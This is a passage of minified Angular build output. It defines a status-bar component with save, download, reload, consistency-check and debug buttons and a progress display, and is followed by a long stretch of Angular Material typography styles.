e=B(2);at("matTooltip",re(1,2,"status-bar.passwordProtectionOff")),V("disabled",!e.dataService.SelectedFile)}}function Yst(t,a){if(1&t){const e=Ye();m(0,"button",14),he("click",function(){return be(e),Me(B(2).dataService.OnSave(!1,!0))}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon",2),s(4,"file_download"),u(),s(5," \n    "),u()}2&t&&at("matTooltip",re(1,1,"pages.home.menu.downloadProject"))}function Jst(t,a){if(1&t){const e=Ye();m(0,"button",14),he("click",function(){return be(e),Me(B(2).dataService.OnSave(!1,!0,!0))}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon",2),s(4,"file_download"),u(),s(5," \n    "),u()}2&t&&at("matTooltip",re(1,1,"pages.home.menu.downloadConfig"))}function Zst(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"button",9),he("click",function(){return be(e),Me(B().dialogService.OpenModelInfoDialog())}),s(3,"\n      "),m(4,"mat-icon",2),s(5,"source"),u(),s(6,"\n    "),u(),s(7,"\n    "),m(8,"button",10),he("click",function(){return be(e),Me(B().dialogService.OpenModelChangesDialog())}),s(9,"\n      "),m(10,"span"),s(11),u(),s(12,"\n    "),u(),s(13,"\n    "),ne(14,Kst,6,3,"button",11),s(15,"\n    "),ne(16,Xst,6,4,"button",12),s(17,"\n    "),m(18,"button",13),he("click",function(){return be(e),Me(B().dialogService.OpenModelTasksNotesDialog())}),oe(19,"translate"),s(20,"\n      "),m(21,"mat-icon",2),s(22,"edit_note"),u(),s(23," \n    "),u(),s(24,"\n    "),m(25,"button",14),he("click",function(){return be(e),Me(B().dataService.ManualConsistencyCheck())}),oe(26,"translate"),s(27,"\n      "),m(28,"mat-icon",2),s(29,"flaky"),u(),s(30," \n    "),u(),s(31,"\n    "),m(32,"button",15),he("click",function(){return be(e),Me(B().dataService.OnSave())}),oe(33,"translate"),s(34,"\n      "),m(35,"mat-icon",2),s(36,"save"),u(),s(37," \n    "),u(),s(38,"\n    "),m(39,"button",14),he("click",function(){return be(e),Me(B().dataService.OnSave(!0))}),oe(40,"translate"),s(41,"\n      "),m(42,"mat-icon",2),s(43,"save_as"),u(),s(44," \n    "),u(),s(45,"\n    "),ne(46,Yst,6,3,"button",11),s(47,"\n    "),ne(48,Jst,6,3,"button",11),s(49,"\n    "),m(50,"button",14),he("click",function(){return be(e),Me(B().dataService.ReloadFile())}),oe(51,"translate"),s(52,"\n      "),m(53,"mat-icon",2),s(54,"refresh"),u(),s(55," \n    "),u(),s(56,"\n  "),Mt()}if(2&t){const e=B();C(10),ri("color",null!=e.dataService.Project&&e.dataService.Project.FileChanged||null!=e.dataService.Config&&e.dataService.Config.FileChanged?"yellow":"white"),C(1),ke(e.dataService.HasProject?null==e.dataService.Project?null:e.dataService.Project.Name:null==e.dataService.Config?null:e.dataService.Config.Name),C(3),V("ngIf",null==e.dataService.SelectedFile?null:e.dataService.SelectedFile.isEncrypted),C(2),V("ngIf",!(null!=e.dataService.SelectedFile&&e.dataService.SelectedFile.isEncrypted)),C(2),at("matTooltip",re(19,14,"status-bar.TasksAndNotes")),V("disabled",!e.dataService.HasProject),C(7),at("matTooltip",re(26,16,"status-bar.ConsistencyCheck")),C(7),at("matTooltip",re(33,18,"general.Save")),V("disabled",!e.dataService.CanSaveFile),C(7),at("matTooltip",re(40,20,"general.SaveAs")),C(7),V("ngIf",e.dataService.HasProject),C(2),V("ngIf",!e.dataService.HasProject),C(2),at("matTooltip",e.dataService.HasProject?"general.ReloadProject":re(51,22,"general.ReloadConfig"))}}function ect(t,a){if(1&t&&(m(0,"span"),s(1),u()),2&t){const e=B();C(1),ke(e.GetProgress())}}function tct(t,a){1&t&&(m(0,"span"),s(1,"-"),u())}function ict(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"button",17),he("click",function(){return be(e),Me(B().dataService.Debug3())}),s(3,"\n      "),m(4,"mat-icon",2),s(5,"bug_report"),u(),s(6,"\n    "),u(),s(7,"\n    "),m(8,"button",18),he("click",function(){return be(e),Me(B().dataService.Debug2())}),s(9,"\n      "),m(10,"mat-icon",2),s(11,"bug_report"),u(),s(12,"\n    "),u(),s(13,"\n    "),m(14,"button",18),he("click",function(){return be(e),Me(B().dataService.Debug())}),s(15,"\n      "),m(16,"mat-icon",2),s(17,"bug_report"),u(),s(18,"\n    "),u(),s(19,"\n  "),Mt()}}let pf=(()=>{class t{constructor(e,i,n,r,c){this.messagesService=e,this.dataService=i,this.dialogService=n,this.locStorage=r,this.translate=c,this.faCodeBranch=Z5,this.showDebug=!1}ngOnInit(){this.version=uf_i}GetProgress(){if(this.dataService.Project){let e=Object.values(this.dataService.Project.ProgressTracker);return 0==e.length?"0%":(100*e.filter(i=>1==i).length/e.length).toFixed(0)+"%"}}ShowDebugBtns(){this.showDebug=!this.showDebug}OpenChangelog(){this.dialogService.OpenChangelogDialog()}}return t.\u0275fac=function(e){return new(e||t)(Ee(A2),Ee(Yi),Ee(Wn),Ee(_r),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-status-bar"]],decls:40,vars:15,consts:[[1,"status-bar","background-color-primary"],["mat-icon-button","","tourAnchor","message-history","matTooltipShowDelay","1000",1,"statusBtn",2,"margin-left","10px",3,"matTooltip","click"],[1,"iconBtn"],[2,"font-size","small"],[4,"ngIf"],["mat-icon-button","","tourAnchor","set-progress",1,"statusBtn",2,"margin-left","20px",3,"click"],[1,"buttonAsText","statusBtn",2,"float","right","margin-right","5px",3,"click"],[1,"buttonAsText",2,"cursor","auto","float","right","margin-right","5px","width","30px","height","18px",3,"click"],[1,"iconBtn","material-icons-outlined"],["mat-icon-button","",1,"statusBtn",2,"margin-left","20px",3,"click"],[1,"buttonAsText","statusBtn",3,"click"],["mat-icon-button","","class","statusBtn","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["mat-icon-button","","class","statusBtn","matTooltipShowDelay","1000",3,"disabled","matTooltip","click",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",1,"statusBtn",2,"margin-left","5px",3,"disabled","matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",1,"statusBtn",3,"matTooltip","click"],["mat-icon-button","","tourAnchor","save-file","matTooltipShowDelay","1000",1,"statusBtn",3,"disabled","matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",1,"statusBtn",3,"disabled","matTooltip","click"],["mat-icon-button","",1,"statusBtn",2,"float","right","margin-right","40px",3,"click"],["mat-icon-button","",1,"statusBtn",2,"float","right","margin-right","5px",3,"click"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"button",1),he("click",function(){return i.messagesService.ShowHistory()}),oe(3,"translate"),s(4,"\n    "),m(5,"mat-icon",2),s(6,"error_outline"),u(),m(7,"span",3),s(8),u(),s(9," \n    "),m(10,"mat-icon",2),s(11,"warning_amber"),u(),m(12,"span",3),s(13),u(),s(14,"\n    "),ne(15,Qst,4,1,"ng-container",4),s(16,"\n    "),ne(17,$st,4,1,"ng-container",4),s(18,"\n  "),u(),s(19,"\n  \n  "),ne(20,Zst,57,24,"ng-container",4),s(21,"\n  "),m(22,"button",5),he("click",function(){return i.dialogService.OpenProgresstrackerDialog()}),s(23,"\n    "),m(24,"mat-icon",2),s(25,"trending_up"),u(),s(26),oe(27,"translate"),ne(28,ect,2,1,"span",4),ne(29,tct,2,0,"span",4),s(30,"\n  "),u(),s(31,"\n  "),m(32,"button",6),he("click",function(){return i.OpenChangelog()}),s(33),u(),s(34,"\n  "),m(35,"button",7),he("click",function(){return i.ShowDebugBtns()}),s(36,"\n  "),u(),s(37,"\n  "),ne(38,ict,20,0,"ng-container",4),s(39,"\n"),u()),2&e&&(C(2),at("matTooltip",re(3,11,"status-bar.messages")),C(6),ke(i.messagesService.ErrorMsgs.length),C(5),ke(i.messagesService.WarningMsgs.length),C(2),V("ngIf",i.messagesService.ShowSuccesses),C(2),V("ngIf",i.messagesService.ShowInfos),C(3),V("ngIf",i.dataService.Project||i.dataService.Config),C(6),ct("",re(27,13,"status-bar.progress"),": "),C(2),V("ngIf",i.dataService.Project),C(1),V("ngIf",!i.dataService.Project),C(4),ct("\n    v",i.version,"\n  "),C(5),V("ngIf",i.showDebug))},dependencies:[Ri,qq,oa,da,Pa,Xi],styles:['.mat-badge-content[_ngcontent-%COMP%]{font-weight:600;font-size:12px;font-family:Roboto,Helvetica Neue,sans-serif}.mat-badge-small[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{font-size:9px}.mat-badge-large[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{font-size:24px}.mat-h1[_ngcontent-%COMP%], .mat-headline[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-h1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-headline[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   h1[_ngcontent-%COMP%]{font:400 24px/32px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0 0 16px}.mat-h2[_ngcontent-%COMP%], .mat-title[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-h2[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-title[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   h2[_ngcontent-%COMP%]{font:500 20px/32px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0 0 16px}.mat-h3[_ngcontent-%COMP%], .mat-subheading-2[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-h3[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-subheading-2[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   h3[_ngcontent-%COMP%]{font:400 16px/28px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0 0 16px}.mat-h4[_ngcontent-%COMP%], .mat-subheading-1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-h4[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-subheading-1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   h4[_ngcontent-%COMP%]{font:400 15px/24px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0 0 16px}.mat-h5[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-h5[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   h5[_ngcontent-%COMP%]{font:400 11.62px/20px Roboto,Helvetica Neue,sans-serif;margin:0 0 12px}.mat-h6[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-h6[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   h6[_ngcontent-%COMP%]{font:400 9.38px/20px Roboto,Helvetica Neue,sans-serif;margin:0 0 12px}.mat-body-strong[_ngcontent-%COMP%], .mat-body-2[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-body-strong[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-body-2[_ngcontent-%COMP%]{font:500 14px/24px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-body[_ngcontent-%COMP%], .mat-body-1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-body[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-body-1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]{font:400 14px/20px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-body[_ngcontent-%COMP%]   p[_ngcontent-%COMP%], .mat-body-1[_ngcontent-%COMP%]   p[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-body[_ngcontent-%COMP%]   p[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-body-1[_ngcontent-%COMP%]   p[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   p[_ngcontent-%COMP%]{margin:0 0 12px}.mat-small[_ngcontent-%COMP%], .mat-caption[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-small[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-caption[_ngcontent-%COMP%]{font:400 12px/20px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-display-4[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-display-4[_ngcontent-%COMP%]{font:300 112px/112px Roboto,Helvetica Neue,sans-serif;letter-spacing:-.05em;margin:0 0 56px}.mat-display-3[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-display-3[_ngcontent-%COMP%]{font:400 56px/56px Roboto,Helvetica Neue,sans-serif;letter-spacing:-.02em;margin:0 0 64px}.mat-display-2[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-display-2[_ngcontent-%COMP%]{font:400 45px/48px Roboto,Helvetica Neue,sans-serif;letter-spacing:-.005em;margin:0 0 64px}.mat-display-1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-display-1[_ngcontent-%COMP%]{font:400 34px/40px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0 0 64px}.mat-bottom-sheet-container[_ngcontent-%COMP%]{font:400 14px/20px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-button[_ngcontent-%COMP%], .mat-raised-button[_ngcontent-%COMP%], .mat-icon-button[_ngcontent-%COMP%], .mat-stroked-button[_ngcontent-%COMP%], .mat-flat-button[_ngcontent-%COMP%], .mat-fab[_ngcontent-%COMP%], .mat-mini-fab[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:14px;font-weight:500}.mat-button-toggle[_ngcontent-%COMP%], .mat-card[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-card-title[_ngcontent-%COMP%]{font-size:24px;font-weight:500}.mat-card-header[_ngcontent-%COMP%]   .mat-card-title[_ngcontent-%COMP%]{font-size:20px}.mat-card-subtitle[_ngcontent-%COMP%], .mat-card-content[_ngcontent-%COMP%]{font-size:14px}.mat-checkbox[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-checkbox-layout[_ngcontent-%COMP%]   .mat-checkbox-label[_ngcontent-%COMP%]{line-height:24px}.mat-chip[_ngcontent-%COMP%]{font-size:14px;font-weight:500}.mat-chip[_ngcontent-%COMP%]   .mat-chip-trailing-icon.mat-icon[_ngcontent-%COMP%], .mat-chip[_ngcontent-%COMP%]   .mat-chip-remove.mat-icon[_ngcontent-%COMP%]{font-size:18px}.mat-table[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-header-cell[_ngcontent-%COMP%]{font-size:12px;font-weight:500}.mat-cell[_ngcontent-%COMP%], .mat-footer-cell[_ngcontent-%COMP%]{font-size:14px}.mat-calendar[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-calendar-body[_ngcontent-%COMP%]{font-size:13px}.mat-calendar-body-label[_ngcontent-%COMP%], .mat-calendar-period-button[_ngcontent-%COMP%]{font-size:14px;font-weight:500}.mat-calendar-table-header[_ngcontent-%COMP%]   th[_ngcontent-%COMP%]{font-size:11px;font-weight:400}.mat-dialog-title[_ngcontent-%COMP%]{font:500 20px/32px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-expansion-panel-header[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:15px;font-weight:400}.mat-expansion-panel-content[_ngcontent-%COMP%]{font:400 14px/20px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-form-field[_ngcontent-%COMP%]{font-size:inherit;font-weight:400;line-height:1.125;font-family:Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-form-field-wrapper[_ngcontent-%COMP%]{padding-bottom:1.34375em}.mat-form-field-prefix[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%], .mat-form-field-suffix[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{font-size:150%;line-height:1.125}.mat-form-field-prefix[_ngcontent-%COMP%]   .mat-icon-button[_ngcontent-%COMP%], .mat-form-field-suffix[_ngcontent-%COMP%]   .mat-icon-button[_ngcontent-%COMP%]{height:1.5em;width:1.5em}.mat-form-field-prefix[_ngcontent-%COMP%]   .mat-icon-button[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%], .mat-form-field-suffix[_ngcontent-%COMP%]   .mat-icon-button[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{height:1.125em;line-height:1.125}.mat-form-field-infix[_ngcontent-%COMP%]{padding:.5em 0;border-top:.84375em solid transparent}.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[_ngcontent-%COMP%]:focus + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.34375em) scale(.75);width:133.3333333333%}.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[label][_ngcontent-%COMP%]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.34374em) scale(.75);width:133.3333433333%}.mat-form-field-label-wrapper[_ngcontent-%COMP%]{top:-.84375em;padding-top:.84375em}.mat-form-field-label[_ngcontent-%COMP%]{top:1.34375em}.mat-form-field-underline[_ngcontent-%COMP%]{bottom:1.34375em}.mat-form-field-subscript-wrapper[_ngcontent-%COMP%]{font-size:75%;margin-top:.6666666667em;top:calc(100% - 1.7916666667em)}.mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-wrapper[_ngcontent-%COMP%]{padding-bottom:1.25em}.mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]{padding:.4375em 0}.mat-form-field-appearance-legacy.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[_ngcontent-%COMP%]:focus + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.28125em) scale(.75) perspective(100px) translateZ(.001px);width:133.3333333333%}.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-form-field-autofill-control[_ngcontent-%COMP%]:-webkit-autofill + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.28125em) scale(.75) perspective(100px) translateZ(.00101px);width:133.3333433333%}.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[label][_ngcontent-%COMP%]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.28125em) scale(.75) perspective(100px) translateZ(.00102px);width:133.3333533333%}.mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{top:1.28125em}.mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{bottom:1.25em}.mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-subscript-wrapper[_ngcontent-%COMP%]{margin-top:.5416666667em;top:calc(100% - 1.6666666667em)}@media print{.mat-form-field-appearance-legacy.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[_ngcontent-%COMP%]:focus + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.28122em) scale(.75)}.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-form-field-autofill-control[_ngcontent-%COMP%]:-webkit-autofill + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.28121em) scale(.75)}.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[label][_ngcontent-%COMP%]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.2812em) scale(.75)}}.mat-form-field-appearance-fill[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]{padding:.25em 0 .75em}.mat-form-field-appearance-fill[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{top:1.09375em;margin-top:-.5em}.mat-form-field-appearance-fill.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-appearance-fill.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[_ngcontent-%COMP%]:focus + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-.59375em) scale(.75);width:133.3333333333%}.mat-form-field-appearance-fill.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[label][_ngcontent-%COMP%]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-.59374em) scale(.75);width:133.3333433333%}.mat-form-field-appearance-outline[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]{padding:1em 0}.mat-form-field-appearance-outline[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{top:1.84375em;margin-top:-.25em}.mat-form-field-appearance-outline.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-appearance-outline.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[_ngcontent-%COMP%]:focus + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.59375em) scale(.75);width:133.3333333333%}.mat-form-field-appearance-outline.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[label][_ngcontent-%COMP%]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.59374em) scale(.75);width:133.3333433333%}.mat-grid-tile-header[_ngcontent-%COMP%], .mat-grid-tile-footer[_ngcontent-%COMP%]{font-size:14px}.mat-grid-tile-header[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%], .mat-grid-tile-footer[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-grid-tile-header[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]:nth-child(n+2), .mat-grid-tile-footer[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]:nth-child(n+2){font-size:12px}input.mat-input-element[_ngcontent-%COMP%]{margin-top:-.0625em}.mat-menu-item[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:14px;font-weight:400}.mat-paginator[_ngcontent-%COMP%], .mat-paginator-page-size[_ngcontent-%COMP%]   .mat-select-trigger[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:12px}.mat-radio-button[_ngcontent-%COMP%], .mat-select[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-select-trigger[_ngcontent-%COMP%]{height:1.125em}.mat-slide-toggle-content[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-slider-thumb-label-text[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:12px;font-weight:500}.mat-stepper-vertical[_ngcontent-%COMP%], .mat-stepper-horizontal[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-step-label[_ngcontent-%COMP%]{font-size:14px;font-weight:400}.mat-step-sub-label-error[_ngcontent-%COMP%]{font-weight:400}.mat-step-label-error[_ngcontent-%COMP%]{font-size:14px}.mat-step-label-selected[_ngcontent-%COMP%]{font-size:14px;font-weight:500}.mat-tab-group[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-tab-label[_ngcontent-%COMP%], .mat-tab-link[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:14px;font-weight:500}.mat-toolbar[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   h1[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   h2[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   h3[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   h4[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   h5[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   h6[_ngcontent-%COMP%]{font:500 20px/32px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0}.mat-tooltip[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:10px;padding-top:6px;padding-bottom:6px}.mat-tooltip-handset[_ngcontent-%COMP%]{font-size:14px;padding-top:8px;padding-bottom:8px}.mat-list-item[_ngcontent-%COMP%], .mat-list-option[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-list-base[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{font-size:16px}.mat-list-base[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-list-base[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]:nth-child(n+2){font-size:14px}.mat-list-base[_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]{font-size:16px}.mat-list-base[_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-list-base[_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]:nth-child(n+2){font-size:14px}.mat-list-base[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:14px;font-weight:500}.mat-list-base[dense][_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{font-size:12px}.mat-list-base[dense][_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-list-base[dense][_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]:nth-child(n+2){font-size:12px}.mat-list-base[dense][_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]{font-size:12px}.mat-list-base[dense][_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-list-base[dense][_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]:nth-child(n+2){font-size:12px}.mat-list-base[dense][_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:12px;font-weight:500}.mat-option[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:16px}.mat-optgroup-label[_ngcontent-%COMP%]{font:500 14px/24px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-simple-snackbar[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:14px}.mat-simple-snackbar-action[_ngcontent-%COMP%]{line-height:1;font-family:inherit;font-size:inherit;font-weight:500}.mat-tree[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-tree-node[_ngcontent-%COMP%], .mat-nested-tree-node[_ngcontent-%COMP%]{font-weight:400;font-size:14px}.mat-ripple[_ngcontent-%COMP%]{overflow:hidden;position:relative}.mat-ripple[_ngcontent-%COMP%]:not(:empty){transform:translateZ(0)}.mat-ripple.mat-ripple-unbounded[_ngcontent-%COMP%]{overflow:visible}.mat-ripple-element[_ngcontent-%COMP%]{position:absolute;border-radius:50%;pointer-events:none;transition:opacity,transform 0ms cubic-bezier(0,0,.2,1);transform:scale3d(0,0,0)}.cdk-high-contrast-active[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{display:none}.cdk-visually-hidden[_ngcontent-%COMP%]{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;white-space:nowrap;outline:0;-webkit-appearance:none;-moz-appearance:none;left:0}[dir=rtl][_ngcontent-%COMP%]   .cdk-visually-hidden[_ngcontent-%COMP%]{left:auto;right:0}.cdk-overlay-container[_ngcontent-%COMP%], 